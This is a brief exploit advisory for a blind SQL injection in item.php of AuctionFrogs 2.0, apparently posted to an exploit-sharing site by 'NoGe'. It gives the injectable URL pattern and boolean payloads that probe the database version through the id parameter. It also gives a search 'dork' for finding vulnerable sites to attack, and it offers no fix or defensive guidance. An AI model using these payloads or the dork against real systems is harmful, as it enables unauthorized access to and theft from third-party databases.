AuctionFrogs 2.0 SQL Injection Vuln


[o] AuctionFrgos 2.0 Blind SQL Injection Vulnerability

Software : AuctionFrogs version 2.0
Vendor : http://auctionfrogs.org/
Author : NoGe


[o] Vulnerable file
item.php


[o] Exploit
http://localhost/[path]/item.php?id=[SQL]
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/item.php?id=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by the Auctionfrogs"


[o] Note
this a private script and all target is in one host